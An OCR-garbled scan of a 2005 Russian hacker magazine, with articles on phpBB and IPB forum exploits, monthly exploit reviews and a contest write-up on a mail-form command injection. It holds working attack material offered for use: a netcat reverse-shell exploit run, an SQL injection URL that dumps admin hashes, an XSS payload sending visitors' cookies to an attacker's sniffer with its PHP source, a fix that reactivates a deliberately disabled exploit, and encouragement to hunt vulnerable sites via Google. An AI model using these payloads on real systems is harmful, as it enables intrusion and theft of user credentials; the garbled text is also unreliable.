[рГірВВ <= 2.0.12 — выполнение произвольного кода] Доступ 
к административной панели — это, согласись, далеко не предел мечта- 
ний. Особенно в том случае, если до самого форума тебе нет никакого 
дела. Точно так же подумал и хакер оѵегсіозе, который использовал об- 
наруженную брешь в зеззіопз.ріір и написал эксплойт для выполнения 

произвольного кода 
на сервере. Для этого 
ему пришлось заю- 
зать особенность од- 
ного из административ- 
ных файлов абтіп_зіу- 
Іез.рТір, позволяющий 
подключить к форуму 
шаблон с внедренной 
функцией еѵаІ($5Іг) 
($зіг — строка, кото- 
рая во время трансля- 
ции будет интерпрети- 
рована как РНР-код). 
Таким образом, полу- 
чилось реализовать 
следующий алгоритм: 




код эксплойта для организации ѵѵеЬ-шелла 




используя брешь в авторизации, 
эксплойт проникает в форум с пра- 
вами администратора, подключает 
вспомогательный шаблон с функ- 
цией еѵаІ() и с помощью специаль- 
ных параметров передает ей код, 
выполняющий системные команды. 
Эксплойт написан на С ( шш.зеси - 
гііуІаЬ . ги/ _ЕхрІоі\з/ 2005/03/ рПрЬЬ- 
ехр.срр.іхі), но чтобы избежать проб- 
лем с компиляцией, рекомендую 
сразу скачать любезно собранный 
бинарник {ѵтѵѵ. 1-паз. огд/ехріоііу/ѵѵіп- 
Ноуѵз/рНрЬЬехр.ехе) . Теперь пару 
слов о применении. Бинарник имеет 
3 параметра: полный адрес форума, 
ІР-адрес компьютера с включенным 
пеісаі’ом и порт, на котором «си- 
дит» пс. Для лучшего понимания 
приведу пример использования: 




Огромное количество 
сайтов не имеют 
собственного адми- 
нистратора, поэтому фо- 
румы долгое время оста- 
ются без должного вни- 
мания. Вероятность найти 
уязвимую версию форума 
намного выше, чем ты 
думаешь. 




Отличным инструментом 
для поиска уязвимых сце- 
нариев является 
ѵѵѵѵѵѵ.доодіе.сот. Подроб- 
нее о том, как производить 
поиск, ты сможешь прочи- 
тать в статье РогЬ’а — 
«Ѳоодіе-хак». 



Э:\хакер\р[ірЬЬехр.ехе ІШр://5ІІе.сот/рІпрЬЬ2/ 62.11.11.11 31337 
_ пот сіи соокіе гесирегег : ріірЬЬ2ту$дІ 

ЗЕЗЗІОЫ Ю гесирегз ... 06ісісіі562ЬЬсі263434243456П1і3212 
[Шр://8ІІе.сот/рІпрЬЬ2/?зіс]=06ІсісіІ5б2ЬЬс]263434243456І1 1 1321 2 
_ гесирегаііоп сіи пот сіе Іа ІаЫе зді ... зетрегѵі ОК 
_ Іфесііоп сіе Іа Таке ТетріаТез ...ОК 
_ Рісіііег сгзе 



0:\хакер\пс.ехе -Іѵѵр 31337 
ІізТепіпд оп [апу] 31337 

соппесИо [62.11.11.11] Тгот зііе.сот [216.237.117.112] 57532 
ісі 

иісі=99(поЬосіу) дісі=99(поЬос1у) дгоирз=99(поЬосіу) 

Гѵіс.ехе — это сетевая утилита ЫеСсаС (ѵѵт /ѵ.зесигіІуІаЬ.ги/Іо- 
0Із/33265.ПітІ), которая создает сетевое соединение на 31337 порту и 
«слушает» входящие подключения. Фактически ты получаешь веб- 
шелл, но если хочешь поковыряться в админ-панели, достаточно уда- 
лить все свои куки и зайти по ссылке, которую тебе выдал эксплойт. В 
моем случае — Шр7/зі\е.сопп/рНрЪЪ2/?зіб=06Шіз62ЪЪб263434243456і1 113212. 



[рГірВВ <= 2.0.13 сіоѵѵпіоасі той — выполнение произвольно- 
го кода] Такие популярные форумы, как рИрВВ, со временем обраста- 
ют множеством независимых дополнений (так называемые гтюсГы и 
Паск’и), совершенствующие форум дополнительными функциями и воз- 
можностями. Однако наряду с новыми фишками появляются и новые 
баги. Не так давно была найдена уязвимость в популярном моде боѵѵп- 
Іоабз, который организовывает систематизированную раздачу файлов 
пользователям форума. Уязвимость критическая: разработчики почему- 
то не сочли нужным фильтровать параметры запроса, поэтому даже не- 
опытный хакер смог бы самостоятельно совершить 301-инъекцию. Зап- 
рос к сценарию составляется по всем канонам классического жанра: 
ѵѵѵѵѵѵ .ѵісііт .сот/рНрВВ/сІоѵѵпІоасІз .рПр? са\=-1%20иМЮ№/о203Е- 
ІЕСТ%200,изег_раззѵ^ог6,0,0,0,0,0,0,0%20ЕИОМ%20рПрЬЬ_изегз%2 
0ѴѴНЕНЕ%20изег_ісІ=1/* . Таким образом извлекается хэш любого из 
пользователей форума, в том числе и администратора — для этого в ка- 
честве изеМсІ нужно обозначить двойку. В случае необходимости ис- 
кать этот шаблон будет неудобно, поэтому я рекомендую тебе использо- 
вать эксплойт ( ѵѵѵѵѵѵ. зесигНуІаЬ. ги/_ЕхрІоіІз/2005/04/сіоѵѵпІоасі5 _рНр- 

ВВ_2_0_ 1 3.рІ. Іхі) , ко- 
торый подходит для 
любой версии <=2.0.13 
с установленным сіоѵѵп- 
іоасі модом. Эксплойту 
передаются три пара- 
метра: имя хоста или 
ІР-адрес, путь к фору- 
му на сервере, иден- 
тификатор админист- 
ратора (в большин- 
стве случаев равен 
2). В случае успеха 
эксплойт вернет ІѴЮ5- 
хэш админа, который 
можно поместить в 
свои куки. 




баг в сценарии боѵѵпІоасІз.рПр позволяет за 2 
минуты спереть информацию обо всех поль- 



уязвимый код сценария зеззіопз.ріір 



зователях 



[ХАКЕР 11 [83] 05 > ВЗЛОМ 073 ] 






[хакер 11 [83] 05 > ВЗЛОМ 074 ] 




[рНрВВ <= 2.0.15 отказ в обслуживании] ЭоЗ-эксплойты для 
ѵѵеЬ-сценариев — большая редкость. Однако они все-таки существуют. 
Недавний эксплойт от зесигііу-группы [І\ІЗТ] способен при некоторых ус- 
ловиях завалить любую версию рГірВВ младше 2.0.16. В основе работы 
эксплойта лежит использование техники узконаправленного флуда. 
Эксплойт просто засыпает форум большим количеством ложных запро- 
сов, для обработки которых требуется большое количество времени. 
Используя недостаточно продуманную систему фильтрации в ргоІіІе.рГір, 
производятся попытки зарегистрировать большое количество пользова- 
телей. На случай неудачи продуман другой вариант — эксплойт начина- 
ет валить сервер с помощью большого количества поисковых запросов 
(файл зеагсЬ.рЬр). Такие запросы составляются особым образом, чтобы 
серверу требовалось максимально возможное количество времени для 
их обработки. 

Существуют две версии этого эксплойта: одна из них написана на чис- 
том С, другая — на РегГе. Мне удалось протестировать обе из них, но 
должен признать, что работают они отнюдь не всегда. Моего домашне- 
го АЭЗІ_-соединения с узким каналом в 256 кбит/с для этого явно не хва- 
тало, поэтому пришлось использовать специально заготовленный шелл. 
После десятка попыток несколько форумов действительно упали: вмес- 
то полноценной работы выдались какие-то ошибки МуЗОІ_. Обе версии 
эксплойта лежат здесь: Ы1р://пеозесигі1у1еат.пе1/іпсІех.рІір?радіпа=асІѵі- 
зогіез&ісІ=15. 

[рГірВВ 2.0.15 — выполнение произвольных команд] Эта вер- 
сия форума — еще одна настоящая находка для хакера. Благодаря гру- 
бой ошибке в реализации подсветки текста становится возможным 
внедрить в исполняемый скрипт произвольный РНР-код. Любой желаю- 
щий может ввести РНР-функцию зузІет(), а в параметрах указать нуж- 
ный набор системных команд, то есть получить своеобразный зГіеІІ. 

Все это безобразие становится возможным из-за неправильного ис- 
пользования функции ргед_герІасе(), вызываемой в сценарии 
ѵіеѵѵіоріс.ріір. Объясню на примере. 




ЮЛЯ, ПРИВЕТ! 

Небольшой асісіоп от Никитоса. Пару недель назад я ко- 
вырялся с багами в ІРВ. Ну и, конечно, мне захотелось 
попробовать какие-то изыскания на практике, и я вбил 
сразу в гугле соответствующий запрос. Каково же было 
мое удивление, когда я наткнулся на сайт Юлии Тимо- 
шенко - видного украинского политического деятеля. 
Да, ты угадал, в качестве форума там использовался 
как раз тот самый бажный ІРВ - даже больше того, он 
до сих пор там стоит :). Я, разумеется, как добропоря- 
дочный гражданин не стал ничего такого делать плохо- 
го, что бы подорвало международный авторитет Украи- 
ны. Тебе, разумеется, тоже этого не советую. Можно 
просто попереться над самим фактом. Какая все-таки 
смешная страна Украина! :) 




<? 

$5Ігіпд1 ="5уз1ет(“ипате -а”)"; 

$зІгіпд2=ргед_герІасе(7/е',$5Ігіпд1,"); 

?> 

Ключ «е» функции ргед_герІасе указывает на то, что $зІгіпд1 нужно интерп- 
ретировать как РНР-код, то есть данный пример выполнит на сервере ко- 
манду ипате -а. Если правильно составить запрос к функции подсветки, 
то внедрить можно совершенно любой код и выполнить на удаленном 
сервере любую команду. Эксплоит, написанный на руШоп, можно скачать 
отсюда — шт.зесигИуІаЬ.ги/_ЕхрІоИз/2005/07/рІірЬЬ2015.ру. 
Примечательно, что эта уязвимость стала логическим развитием крити- 
ческого бага, исправленного еще в рГірВВ 2.0.11. При всей любви хаке- 
ров к рГірВВ, ее разработчики почему-то довольно халтурно зализыва- 
ют многочисленные ошибки, даже критические. 

[рНрВВ <=2.0.16 — межсайтовый скриптинг] Для начала давай 
вспомним, что из себя представляет межсайтовый скиптинг (Сгозз Зііе 
Зсгірііпд). ХЗЗ-нападение подразумевает, что хакеру удалось инъекти- 
ровать свой НТМЬ-код в уязвимый сценарий. В большинстве случаев 
этот код представляет небольшой ^ѵаЗсгірІ-сценарий, предназначен- 
ный для кражи конфиденциальной информации о пользователях (их 
соокіез, идентификаторы сессий и т.д.). Иногда ХЗЗ позволяет обойти 
механизм аутентификации, а в некоторых случаях — даже выполнить 
произвольную команду на стороне сервера. 

Не буду таить: в рГірВВ подобный багов полно. Наиболее универсальная 
уязвимость, которая присуще всем рГірВВ <=2.0.16, была найдена в ко- 
де обработки тэга [ІІВІ_]. Недостаточно продуманные регеспы позволя- 
ют сделать вложенные ВВ-тэги ІІВІ_ и инъектировать ^ѵаЗсгірІ-код. 
Весь эксплойт (апІісІіаІ.ги/іхі/рІірЬЬ/) вы глядит следующим образом: 
[соІог=ЦВЕТ_ФОНА][игІ]ѵѵѵѵѵѵ.иІ[игІ=ѵѵѵѵѵѵ.з="зІуІе='ІопІ-5І2е:0;соІог:ЦВЕТ_ФО- 
НА'зіуІе='Іор:ехргез5іоп(еѵаІ(ІГііз.ззз)); І ззз='і=пеѵѵ/**/Ітаде();і.згс='Гіир:/Лѵоі_5 
егѵег.ги/сді-Ьіп/зпіІІ.рГір? І +сІоситеп1.соокіеЛГіі5.ззз=пиІГ5ІуІе=1опі- 
5І2е:0;][/игІ][/игІ]'[/соІог] 

Эксплойт, написанный 2асІохІік с ѵѵѵѵѵѵ.апіісііаі.ги, отсылает куки по- 
сетителей форума на специальный скрипт-снифер, расположенный 
по адресу Ыір://Іѵоі_зегѵег.ги/сді-Ып/зпіН.рІір. Этот скрипт может 
быть установлен на любом бесплатном хостинге с возможностью ис- 
пользования РНР: 



сплоит для ІРВ против сайта Юлии Тимошенко 









<?р|1р 

$соокіе = $_6ЕТ['с']; 

$ір = деіепѵ ('ВЕМОТЕ_АООВ'); 

$сІаІе=сІаІе("і Р, У, д:і а"); 

$геТегег=де1:епѵ ('НТТР_ВЕРЕВЕВ'); 

$Ір = Іореп('соокіе5.М', 'а'); 

І\л/гіІе($Ір, 'Соокіе: '.$соокіе.'<Ьг> ІР: 1 .$ір. 
'<Ьг> Эаіе апсі Тіте: 1 .$сІаІе. '<Ьг> ВеТегег: 
\$ге!егег.ЧЬг><Ьг><Ьг>'); 

ТсІ05е($Тр); 

?> 

Ты, наверное, заметил, что в коде эксплойта 
есть странный параметр — ЦВЕТ_ФОНА. Ав- 
тор эксплойта сделал это неслучайно. Дело в 
том, что эксплойт сработает только у посетите- 
лей, использующих Іпіегпеі Ехріогег. Орега и 
Рігеіох воспринимают такой код некорректно и 
выводят сообщения об ошибке. Чтобы не выда- 
вать себя, эксплойт маскирует их, отображая 
сообщения об ошибках цветом фона, то есть 
делает их невидимыми. Этот цвет можно взять 
из текущего шаблона, в частности для станда- 
ртной темы он равен — #ЕРЕРЕР. 

[Іпѵізіоп Роѵѵег ВоагсІ] ІРВ подобно рГірВВ 
является чрезвычайно популярным скриптом 
для создания форума, однако количество най- 
денных в нем уязвимостей на порядок меньше. 
Скажу больше: серьезные дырки, из которых 
реально возможно причинить урон серверу 
практически отсутствуют, в багтраке нет ни од- 
ного сообщения о возможности выполнить на 
удаленной машине произвольный код. После 
долгого изучения багов и эксплойтов хочется 
обратить внимание лишь на один эксплойт — 
универсальный вариант для совершения 501- 
инъекции как для ветки 1 .х, так и 2.x (до вер- 
сии 2.0.4) ІРВ. 

[ІРВ 1.x, 2.x (<2.0.4) — доступ к админ- 
панели] Любая из обозначенных версий ІРВ 
подвержена 501-инъекции. Это достигается за 
счет недостаточно серьезной обработки соок- 
іез-файлов в сценарии зоигсез/Іодіп.рИр. Баг 
закрался в функции ту_деІсоокіе($пате), ко- 
торая некорректно использует функцию игібе- 
собе(). Если на сервере включены тадіс 
циоіез, переданный в запросе символ %2527, 
превращается в одинарную кавычку. Благода- 
ря этому хакеру удается выполнить любой 
50І_-запрос и извлечь хэши пользователей. 
Эксплойт для этой уязвимости выпустили сра- 
зу несколько зесигііу-команд, в том числе и 
В5Т. Ты можешь скачать его с МІр://гз1.ѵоісІ.ги/- 
с!оѵѵпІоасІ/г57ірЬ2.М, но спешу огорчить: сразу 
он у тебя не заработает. ІсМ.ѵѵОІІ, который 
разработал этот эксплойт, умышленно оста- 
вил в нем логическую ошибку, реализовав 
защиту от дурачков. Знакомому с РегГом че- 
ловеку не составит труда найти ее, но чтобы 
не мучиться — подскажу. Для восстановле- 
ния работоспособности нужно лишь заме- 
нить строку «$аІІсГіаг .= сПг(42);» на строку 
«$аІІсІіаг .= сГіг($і);». 

Для работы регі-скрипту необходимо передать 
4 параметра: адрес сервера, путь до форума, 
тетЬеМсІ (для администратора — 1), версия 
ІРВ (0 — ІРВ 1.x, 1 — ІРВ 2.x). В конкретном 
примере это выглядит так: г57ірЬ2.рІ і/ѵі/ѵіллу/'с- 
ііт.сот/ІРВ/ 1 1 . Ключевое условия для успеха: 
тадіс_циоІез в конфиге РНР на сервере долж- 
ны быть включены. 

[конец] Многие осуждают использование го- 
товых эксплойтов, но в этом нет ничего зазор- 
ного. Пускай серьезного опыта на таких взло- 



ЧТО ДЕЛАТЬ С ХЭШЕМ ПАРОЛЯ 
АДМИНИСТРАТОРА? 

Многие из представленных эксплой- 
тов позволяют получить хэш паро- 
ля администратора. Однако хэш — 
это не сам пароль, а как бы его от- 
печаток, некоторая сигнатура. Поэ- 
тому указать его в качестве пароля 
нельзя. Есть два варианта его ис- 
пользования. 

Первый вариант самый очевидный 
— расшифровать хэш и получить 
пароль в открытом виде. Большин- 
ство форумов используют для гене- 
рации хэшей алгоритм ІѴЮ5, кото- 
рый может быть расшифрован иск- 
лючительно брутфорсом (тупым, по 
словарю или с помощью таблиц ра- 
дуги - не важно). Среди специаль- 
но предназначенных для этого ути- 
лит, я бы выделил программу 
Раззѵѵо гсізРго ( і/і/і/і/і/і/. іпзісіерго . сот ) . 

К ее достоинства можно отнести 
хорошую функциональность (пере- 
бор по словарю, по маске, тупой 
перебор по автоматически состав- 
ленным комбинациям), высокую 
скорость перебора, возможность 
расшифровать несколько видов хэ- 
шей (Му50І_, разновидности ІѴЮ4 и 
ІѴЮ5, 5НА-1 и 5НА-1). Словарь для 
перебора может значительно уве- 
личить шансы на успех — его мож- 
но скачать, например, с 
т /ѵѵѵ.пзсі.ги. Для расшифровки 
ІѴЮ5-хэшей существуют также 
опііпе-сервисы. Наиболее продви- 
нутым из них по праву считается 
ѵѵѵѵѵѵ.раззсгаскіпд.сот, использую- 
щий распределенную систему вы- 
числений и огромную базу хэш-таб- 
лиц (47,6 Гб). В любом случае для 
расшифровки хэша может потребо- 
ваться немало времени, поэтому я 
рекомендую использовать другой 
вариант. 

После того как ты авторизировался 
на форуме (с правами обычного 
пользователя) на твоей машине ав- 
томатически создалась плюшка 
(соокіе), содержащая хэш твоего па- 
роля. Это необходимо для того, что- 
бы форум «запомнил» тебя, и тебе 
не приходилось вводить пароль за- 
ново. Это играет нам на руку, так 
как, подменив хэш своего собствен- 
ного пароля на хэш пароля админи- 
стратора, ты сможешь без каких-ли- 
бо проблем залогиниться под его ак- 
каунтом. Отредактировать соокіез 
можно с помощью утилиты Соокіе 
Есійог {уѵт /ѵ.ргохоіі.сот) или, напри- 
мер, с помощью редактора плюшек, 
встроенного в браузер Орега 



мах хакер не наберется, но зато сможет легко 
разжиться полноценным *піх-шеллом. А это, 
между прочим, уже хороший плацдарм для бу- 
дущих взломов, для которых возможно придет- 
ся устанавливать свой собственный прокси- 
сервер без логов или, к примеру, сканировать 
целые подсети ІР-адресов для поиска машин с 
определенной уязвимостью. рГірВВ представ- 
ляет для этого отличную возможность — ду- 
маю, что уложить его на лопатки не такая уж 
сложная задача @ 
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ѲШ МАІШТИЗ ІМАР4Э 
ВЕМОТЕ Р-3 ЕХРЮІТ 
[описание] Ещѳ весной в багтраке появи- 
лась новость, сообщающая о том, что в извест- 
ном продукте ОШ Маііиіііз закрались несколь- 
ко подозрительных уязвимостей. Все они пере- 
полняли буфер и провоцировали ЭоЗ-атаку. 
Как это обычно бывает, багоискатели не сооб- 
щили никаких подробностей об ошибках. Толь- 
ко в конце сентября команда ЮЕРЕЫЗЕ откры- 
ла людям глаза, написав эксплойт, запускаю- 
щий командный интерпретатор. 

Суть ошибки проста как мир: в коде модуля 
зеагсП.с отсутствует проверка на длину поис- 
ковой переменной. Таким образом, взломщик 
выполняет команду ІМАР вида «ЗЕАВСН 
ТОРЮ %08х.%08х.%08х.%08х зііеіісосіе» и по- 
лучает права суперпользователя (или юзера, 
запустившего Ітар4с1). 

[защита] Защититься от бреши можно двумя 
способами: поставить патч, который предлагают 
Ю Е РЕ N 3 Е ( Ы1р://за ѵаппаіі.дпи . огд/раІсЬ/Ьоѵѵп- 
Іоасі.рЬр?іІет_ісі=4407&іІет_ІіІе_ісі=5 160), либо 
обновить версию Маііиіііз с официального сай- 
та (ѵѵѵѵѵѵ.дпи.огд/зоііѵѵаге/таііиіііз/таііиіііз.ыті) . 

[ссылки] Скачивай эксплойт по ссылке 
ѵѵѵѵѵѵ. зесигііуІаЬ. ги/рос/ехіга/24 035 1 .ріір. Под- 
робный некролог от ЮЕРЕЫЗЕ ты можешь про- 
читать по адресу ѵѵѵѵѵѵ. ісіеіепзе . сот/арріісаііоп/ 
роі/сіізрІау?ісІ=303&Іуре=ѵиІпегаЫІіІіез&1ІазЬзІа- 
1из=1ше. 

[злоключение] Помимо этой бреши, в таііи- 
Іііз нашли занятную 50І_-инъекцию. Пока осо- 
бых подробностей не сообщается, но известно, 
что баг таится в сишнике аиНі/зцІ.с. Так что ис- 
следуй код и набредешь на истину :). 

[дгееіз] Как всегда отличилась команда 
ЮЕРЕЫЗЕ. Дружно поблагодарим ее за столь 
щедрый эксплойт и пожелаем развиваться в 
том же направлении. 



КЗАТЕѴѴАѴ «ОЕВІІѲ» МСЮЕ 
ВЕМОТЕ ВОР ЕХРЮІТ 
[описание] В прошлом выпуске я писал о до- 
садном баге в программном продукте Зпогі. 
Спустя месяц мир узнал о похожей уязвимос- 
ти, правда, уже в проекте Юаіеѵѵау от извест- 
ного производителя Сотриіег Аззосіаіез. Как и 
в Зпогі, брешь вызывается кривым запросом к 
демону и может быть выявлена только при за- 
пуске в режиме отладки (этот режим выключен 
по умолчанию). 

Но главное отличие от бреши в Зпогі — ошиб- 
ка может привести к выполнению произволь- 
ного кода. Так, например, в выложенном 
эксплойте запускается шелл на порту 1711. 
Если внимательно посмотреть в код эксплойта, 
то можно увидеть два таргета для систем 
ѴѴіпХР+ЗР2 и ѴѴіп2к+ЗР4. Прежде чем компи- 
лировать сишный код, проверь версию систе- 
мы и откомментируй нужную строку. 

[защита] Пока компания Сотриіег Аззосіаіез 
не отреагировала на баг в продукте и не выпус- 
тила никаких заплаток и новых релизов. Поэто- 
му единственный способ залатать брешь — от- 
казаться от запуска в режиме отладки. 

[ссылки] Скачать эксплойт можно здесь: 
ѵѵѵѵѵѵ. зесигііуІаЬ. ги/рос/ехіга/24 1 0 12рІір. Подробное 
описание бага находится по ссылке ѵѵѵѵѵѵ.зеси- 
гіІуІаЬ.ги/ѵиІпегаЫІИу/зоигсе/24 101 0.рЬр. 

[злоключение] Большинство администрато- 
ров любят включать различные продукты в ре- 
жиме дебага. Такие люди могут здорово постра- 
дать от шаловливых хакерских рук. Поэтому 
мой тебе совет — никогда не включай отладку и 
не доверяй продуктам третьих производителей. 

[дгееіз] Об ошибке в программном продукте 
сообщил некто Егіка Мепсіога. Поблагодарим 
его (или ее) за столь интересную информацию. 
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ХІЫЕ-ЫВ ВЕМОТЕ 
РОВМАТ ЗТВІЫѲ ЕХРЦЭІТ 
[описание] В популярном линуховом плеере 
с именем хіпе была найдена критическая 
ошибка. Баг находится в файле Іпри1_сс1с1а.с и 
представляет собой обычную уязвимость фор- 
матной строки. Как ты, наверное, понял, код 
этого сишника выполняется при чтении мета- 
данных СО-диска с сервера СООВ. Информа- 
ция о треках записывается в специальный хэш- 
файл, но перед этим передается в функцию 
зргіпІІ(). Естественно, что никаких дополни- 
тельных проверок на «чистоту» данных не про- 
изводится. Если подумать, то можно предуга- 
дать действия злоумышленника: хакер может 
поднять собственный СООВ-сервер и заста- 
вить жертву обратиться к нему. Либо с по- 
мощью современных технологий перехватить 
информацию о треках и слегка изменить ее. 
Эксплойт полностью написан на РегІ и предс- 
тавляет собой фейковый сервис СООВ. Одна- 
ко публичный вариант сплоита просто убивает 
хіпе, а не выполняет произвольный код. 

[защита] В последнем релизе хіпе (1 .0.3а) уяз- 
вимость была исправлена. Можешь смело обнов- 
лять плеер с официального сайта ЫІр://хіпеЬд.сІе. 

[ссылки] Сливаем сплоит по ссылке шт.зеси- 
гіІуІаЬ. ги/рос/ехіга/24 1081 .рЬр. За подробностями 
можно обратиться к специальному объявлению на 
ѵѵѵѵѵѵ.зесигіІуІаЬ.ги/ѵиІпегаЬіІіІу/зоигсе/241076.рІір. 

[злоключение] Данная уязвимость может 
проявлять себя не только при проигрывании 
СЭ-файлов. Существует специальный потоко- 
вый формат Аибіо СО МВІ_ (тебіа гезоигсе 
Іосаіог), который можно прослушивать через 
Интернет. Естественно, что за информацией о 
треке хіпе обращается к СООВ. 

[дгееіз] Автором эксплойта является человек 
с именем 1111 НагпИаттаг. Он входит в хакерс- 
кую группу Зесигііеат (зирроП@зесигіІеат.ги). 
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наглядное эксплуатирование сервиса 



эти продукты опасны для жизни! 



мутим подложный СООВ-сервер 
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ВЕАІ_РІ_АѴЕВ РОВМАТ ЗТВІІЧѲ ЕХРЮІТ 

[описание] Еще одна уязвимость форматной 
строки была найдена сразу в двух ВеаІ-пле- 
ерах под І_іпих — ВеаІРІауег и Неііх. Ошибка 
вызывается при проигрывании подложного 
файла с расширением *.гр. С первого взгляда 
эксплойт не представляет особой ценности: 
это чисто локальное средство нападения, соз- 
дающее гр-файл и запускающее ВеаІРІауег с 
последующим открытием шелла на порту 
4444. Но данный файлик можно опубликовать 
в глобальной сети и раскидывать ссылки начи- 
нающим юниксоидам :). 

Чтобы было понятно, привожу структуру под- 
ложного гр-файла, провоцирующего данный баг: 

<ітТІ> 

<ІпеасІ 

ІШе="ЮЕРЕІ\ІЗЕ І_аЬз ВеаІРіх ѴиІпегаЬіІіІу" 
Ііте!огтаІ="%п%п%п%п%п%п"/> 

</ітТІ>. 

Уязвимыми считаются следующие продукты: 
ВеаІРІауег 10.0.4.750, а также Неііх РІауег 
1.0.6. 

[защита] Защититься от бреши можно простым 
апдейтом версии плееров ( МІр://геаІ.сот или 
ШрУ/ІіеІіхсоттипіІу.огд) . Также помни про опас- 
ность при открытии неизвестных ссылок в Интер- 
нете. Особенно, если тебе предлагают послу- 
шать произведение неизвестного исполнителя :). 

[ссылки] Эксплойт можно взять отсюда: 
ѵѵѵѵѵѵ .зесигііу .ппоѵ .ги/1іІез/ІіеЧх4геаІ .с. Подроб- 
нейший мануал по его использованию, а также 
детали уязвимости можно найти на этой страни- 
це — Шр://зесигіІу.ппоѵ.ги/исІоситеп1809.ЫтІ. 

[злоключение] Ошибка в ВеаІРІауег’е может 
привести к весьма плачевным последствиям. 
Как не крути, а в нашем мире полно пользова- 
телей, кликающих на все подряд. Поэтому ха- 
керу достаточно разместить подложный файл 
в Интернете и заставить какого-нибудь юник- 
соида послушать музыку. 

[дгееіз] Информацию об уязвимости сообщил 
некий сОпІех (сОпІехЬ@дтаіІ. сот). Затем всем 
известная группа Зесигііеат подхватила эту 
идею, и ее участники написали сокрушитель- 
ный эксплойт. 



ОРОРРЕВ РОРРАЗЗЭ 
І_ОСАІ_ ВООТ ЕХРЮІТ 

[описание] Если ты линухоид, то наверняка 
слышал (или даже юзал) рорЗ-демон с прек- 
расным названием Ороррег. Спешу тебя огор- 
чить, что в одном из его компонентов была 
найдена уязвимость. Суть ее в том, что с по- 
мощью суидного файла рорраззб, служащего 
для смены пользовательского пароля, можно 
создать любой локальный файл. Таким обра- 
зом, в эксплойте создается системный файл 
/еІс/НЬтар.сопІ (для РгееВЗЭ) и іеіс/ів.зо.рге- 
ІоасІ (для І_іпих), в который затем записывается 
фейковая библиотека. В этой либе происходит 
создание локального рутового шелла /Ітр/зиісІ. 
Теперь разберемся как работает эксплойт: 
сперва создается файл, затем в него заносит- 
ся ссылка на подложный модуль. После этого 
запускается /Ып/зи, провоцирующий выполне- 
ние модуля. Если все действия увенчались ус- 
пехом, то в каталоге /ітр появится суидный 
файл зиісі. Это и будет заветный рутшелл :). 
Эксплойт, написанный на ЬазИ, поставляется в 
двух вариантах — для І_іпих и для РгееВЗЭ. 

[защита] Как утверждает автор эксплойта, 
уязвимыми являются все версии Ороррег до 
4.0.8 включительно. Разработчики продукта 
пока не шевелятся и не выпускают патчи, поэ- 
тому защиты от бага пока не существует. 

[ссылки] Эксплойт можно получить по ссылке 
ѵѵѵѵѵѵ.зесигііу. ппоѵ. ги/НІез/рорраззб-Іпх. зіі (І_іпих) 
или ѵѵѵѵѵѵ.зесигііу. ппоѵ.ги/Шез/рорраззб-ігееЬзб.зІі 
(РгееВЗЭ). 

[злоключение] Ороррег — это продукт, кото- 
рый издавна славился своими багами. Не так 
давно была найдена брешь в том же модуле 
рорраззб, позволяющая сменить пароль любо- 
му пользователю. Поэтому мой совет — отка- 
заться от этого сомнительного продукта :). 

[дгееіз] Об уязвимости сообщил некто ксОре. 
Первый источник, который об этом узнал, име- 
нуется какіиіі-бізсіозиге (ІиІІ-бізсІозиге@ІізІз.пеІ- 
зуз.сот). 
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М8 ѴѴІІХЮОѴѴЗ ІЧСМ 
І_ОСАІ_ 003 (М305-045) 

[описание] В этом месяце как обычно отли- 
чились продукты МісгоЗоК. На этот раз багоис- 
катели нашли брешь в сервисе ІМеІѵѵогк 
Соппесііоп Мападег. Если верить их словам, то 
служба может быть временно остановлена при 
приеме некорректного ТСР-пакета. Примеча- 
тельно, что при воздействии эксплойта преры- 
ваются все активные подключения. Однако при 
восстановлении соединения менеджер ожива- 
ет и продолжает нормально функционировать. 
Эксплойт корректно работает с системами 
ѴѴІП2000 (ЗР1-4), ѴѴіпХР (ЗР1, ЗР2) и ѴѴІП2003 
(ЗР1). В системах ѴѴіпХР+ЗР2 и ѴѴіп2003+ЗР1 
баг может эксплуатировать только локальный и 
авторизованный пользователь. На более старых 
операционках брешь можно вызвать удаленно. 
Однако первый публичный релиз эксплойта ори- 
ентирован только для локального нападения. 

[защита] Защититься можно с помощью специ- 
альных патчей, заботливо выложенных МісгозоЙ. 
Список заплаток можно найти на странице 
ѵѵѵѵѵѵ. зесигііуІаЬ . ги/ѵиІпегаЫЧіу/24 0996.рЬр . 

[ссылки] Эксплойт находится здесь: ѵѵѵѵѵѵ.зеси- 
гіІуІаЬ.ги/рос/ехІга/241 127.рІір и доступен для 
скачивания. Описание уязвимости можно найти 
на ссылке ѵѵтѵ.зесигііуІаЬ.ги/поІііісаІіоп/240988.ріір. 

[злоключение] Степень опасности данной 
ошибки не велика — пока что это простой ЭоЗ. 
Однако в некоторых случаях обрыв текущих 
соединений может привести к нехорошим пос- 
ледствиям. Поэтому обязательно установи 
спасительный патч в твою операционку, а так- 
же закрой порты 135-139, 445 на твоем файр- 
воле, если еще этого не сделал. 

[дгееіз] Эксплойт был написан еще 14 июля 
2005 года хакером ЬкЫІ (ЬкЫІ@спІіопкег.пеІ). В 
публичные источники данное творение попало 
14 октября 2005 года. 
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смерть для ВеаІРІауег 



локальная почтовая атака 



некролог для сетевой службы 



ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕВВІІМ НЬЮСЫ 
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Пора подводить итоги прошедшего месяца, приятель. К сожалению, тогда получился облом с ру- 
танием ипіх-сервера и эту затею мы были вынуждены ненадолго отложить. В октябрьском конкур- 
се тебе необходимо было похакать незадачливых барыг, которые предоставляют ѴРЫ-сервис. В 
качестве начальной мишени атаки выступал сайт ммм.радопакхи, на котором находилась стра- 
ничка с формой обратной связи для пользователей сервиса. Как несложно догадаться, все сооб- 
щения, вбиваемые в эту форму, либо записываются в базу данных, либо отправляются на мыло. 
Ввод разнообразных комбинаций кавычек, ключевых слов и символов зці-комментариев ни к че- 
му не привел, в результате чего должна была задориться мысль, что все данные фильтруются, ли- 
бо сообщение просто отправляется на мыло, и все твои кавычки никого не тревожат. Первый ва- 
риант не рассматривается, поскольку скрипт в нашем конкурсе по определению бажный. 

Баг был на самой поверхности: е-таіі сообщение почему-то отсылается при помощи вызова 
программы таіі через функцию зуз1ет(). Поскольку баклан-программист при этом решил не 
фильтровать ни единого символа, сценарий получился просто находкой для таких, как ты. 
Перебрав все комбинации, легко было найти нужную: в поле «Тема» надо было вбить что-то вро- 
де ;іб;#. Здесь ісі — это выполняемая команда. Смотри, что при этом происходит. 

Мыло отправляется таким образом: 

есііо с $теззаде’ІтаіІ -з $зиЬ]ес1 Ыаіі@хакер.ги 

